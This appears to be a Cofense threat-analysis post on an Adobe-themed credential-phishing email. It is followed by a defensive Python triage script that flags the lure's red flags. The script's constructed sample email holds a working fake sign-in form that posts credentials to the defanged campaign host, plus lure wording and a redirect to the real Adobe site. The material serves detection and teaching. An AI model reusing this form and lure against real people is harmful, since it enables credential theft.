By Zachary Bailey, Cofense Phishing Defense Center
The Cofense Phishing Defense Center (PDC) has seen the rise of threat actors impersonating common document-sharing services to harvest credentials. These attacks can also use legitimate services to host malicious documents that are delivered to an unsuspecting employee who trusts the domain where they are hosted.
Some of these attacks do not need to spoof the sender, such as this Adobe phish (Figure 1) that was found in a Proofpoint environment. The email appears merely to deliver a purchase order that has been encrypted via Adobe Document Cloud. Adobe is only one of several components of the phish: the email builds credibility by posing as a government agency and suggests that the recipient can sign into Adobe to decrypt the file, or download Acrobat Reader to view it instead.
Figure 1: Email Body
The email is styled as a forwarded message, as though the recipient were expecting it: the subject is FW: Purchase Order 3500250780, followed by the name of the organization supposedly sending the PO. A common tactic used by threat actors is to fake a reply chain by inserting “RE” or “FW” into the subject line, so the recipient assumes the message is a response to a conversation they initiated or were part of.
Even though the sender address is clearly on a Gmail domain, it is not uncommon for work-related email to pass between personal and corporate accounts, so the free-mail sender alone may not raise suspicion.
The email is rather informative, listing the correct postal address and contact information for the government office it is impersonating. As mentioned earlier, the email body says, “To read it you sign into Adobe Document Cloud or download the latest Adobe Acrobat Reader.” Recipients are not pressured to sign in; they are even offered an alternative that would not put their credentials at risk. The only note of urgency, “with immediate effect please ensure all invoices are addressed as below”, reads as routine instruction on how to address the invoice.
Figure 2: Step 1 of Attack
When the recipient opens the document, its contents are not immediately visible: a popup covers the page while its assets load, and the recipient is expected to read it before proceeding. Because the file is opened locally rather than hosted on a website, checking the URL will not tip users off; as far as they can tell, they are simply viewing a file on their computer. The popup reads “This document is electronically encrypted to the receiver’s email”, a strange way of saying that only the recipient can unlock the document. To a user unfamiliar with technical terms it may still sound legitimate, but it should be the first hint that something is amiss. The second part of the popup urges them to sign in with “authenticated email credentials”, an even more obvious sign that the form wants their login details.
Figure 3: Step 2 of Attack
After the user clicks through to the login page, a full web page styled as the Adobe Document Cloud site appears. This still occurs inside the downloaded document, so the only way to learn where the form submits, without pressing “Sign in”, is to inspect the document’s code. To verify where the login information goes, we captured the network traffic and sent a request through: the submitted data went to “infiniteworks[.]net/IDI/high.php”, which is not part of Adobe.
Figure 4: Final Redirect of Phish
After handing their Adobe credentials to the attacker, the victim is redirected to a new web page. If they check the URL at this point, they will find they are now on the real Adobe website. Since no document has actually been decrypted, this should make clear that something is wrong, and they should alert their security team immediately.
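The following triage script is an added example, not code from Cofense or from the campaign; it pulls together the checks described above: the fake “FW:” thread with no threading headers, the free-mail sender, the sign-in form inside the attachment that posts somewhere other than Adobe, and the bounce to the genuine Adobe site afterwards. It assumes the downloaded document is an HTML attachment (the write-up says only that its code could be inspected). The sample message is constructed: the sender address, attachment name and post-submit URL are placeholders, while the subject and the form target are the ones reported above; the malicious host is written defanged so the file carries no live link.

```python
import re
from email import message_from_bytes, policy
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample, not the real message from the campaign. Sender address,
# attachment name and post-submit URL are placeholders; subject and form target
# are as reported. The malicious host is defanged ("[.]") on purpose.
RAW_EMAIL = b"""From: "Purchasing Office" <purchasing.office.po@gmail.com>
To: employee@victim.example
Subject: FW: Purchase Order 3500250780
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="po-boundary"

--po-boundary
Content-Type: text/plain; charset="utf-8"

Please find attached. To read it you sign into Adobe Document Cloud or
download the latest Adobe Acrobat Reader.

--po-boundary
Content-Type: text/html; charset="utf-8"; name="Purchase_Order.html"
Content-Disposition: attachment; filename="Purchase_Order.html"

<html><body>
<p>This document is electronically encrypted to the receiver's email.
Sign in with authenticated email credentials to view.</p>
<form action="https://infiniteworks[.]net/IDI/high.php" method="post">
  <input name="email"><input name="password" type="password">
  <button type="submit">Sign in</button>
</form>
<script>
  // stand-in for the post-submit bounce to the genuine brand site
  setTimeout(function () { window.location = "https://www.adobe.com/"; }, 3000);
</script>
</body></html>
--po-boundary--
"""

FREEMAIL_DOMAINS = {"gmail.com", "outlook.com", "hotmail.com", "yahoo.com"}
THREAD_PREFIX = re.compile(r"^\s*(re|fw|fwd)\s*:", re.IGNORECASE)
# Crude matcher for the common JavaScript redirect idioms in inline scripts.
JS_REDIRECT = re.compile(
    r"""(?:window\.|document\.)?location(?:\.href)?\s*=\s*["']([^"']+)["']"""
    r"""|location\.replace\(\s*["']([^"']+)["']"""
)


class FormAndScriptExtractor(HTMLParser):
    """Collects <form action> targets and inline <script> text from HTML."""

    def __init__(self):
        super().__init__()
        self.form_actions = []
        self.script_text = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "form":
            action = dict(attrs).get("action")
            if action:
                self.form_actions.append(action)
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.script_text.append(data)


def host_of(url):
    """Hostname of a URL; accepts defanged input so pasted IOCs work too."""
    return (urlsplit(url.replace("[.]", ".")).hostname or "").lower()


def defang(host):
    return host.replace(".", "[.]")


def belongs_to(host, brand_domains):
    return any(host == d or host.endswith("." + d) for d in brand_domains)


def triage(raw_message, brand_domains=("adobe.com",)):
    """Return the red flags found in a raw message and its HTML attachments."""
    msg = message_from_bytes(raw_message, policy=policy.default)
    subject = msg.get("Subject", "")
    sender_domain = parseaddr(msg.get("From", ""))[1].rpartition("@")[2].lower()
    findings = {
        # "RE:"/"FW:" with no threading headers: a conversation that never happened
        "fake_thread_prefix": bool(THREAD_PREFIX.match(subject))
        and not (msg.get("In-Reply-To") or msg.get("References")),
        "freemail_sender": sender_domain if sender_domain in FREEMAIL_DOMAINS else None,
        "credential_targets": [],     # off-brand hosts the sign-in form posts to
        "post_submit_redirects": [],  # hosts the victim is bounced to afterwards
        "redirects_to_brand": False,
    }
    for part in msg.iter_attachments():
        if part.get_content_type() != "text/html":
            continue
        extractor = FormAndScriptExtractor()
        extractor.feed(part.get_content())
        for action in extractor.form_actions:
            host = host_of(action)
            if host and not belongs_to(host, brand_domains):
                findings["credential_targets"].append(defang(host))
        for match in JS_REDIRECT.finditer("".join(extractor.script_text)):
            host = host_of(match.group(1) or match.group(2))
            findings["post_submit_redirects"].append(defang(host))
            if belongs_to(host, brand_domains):  # the tell: bounce to the real site
                findings["redirects_to_brand"] = True
    findings["verdict"] = "credential phish" if findings["credential_targets"] else "no off-brand form target"
    return findings


if __name__ == "__main__":
    for key, value in triage(RAW_EMAIL).items():
        print(f"{key}: {value}")
```

Run against the sample, the form target is reported as infiniteworks[.]net while the only redirect goes to www[.]adobe[.]com, which is exactly the mismatch an analyst is looking for. The regex for redirects is deliberately crude; obfuscated or dynamically built URLs still require opening the attachment in an instrumented browser, as was done above with the network capture.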
Indicators of Compromise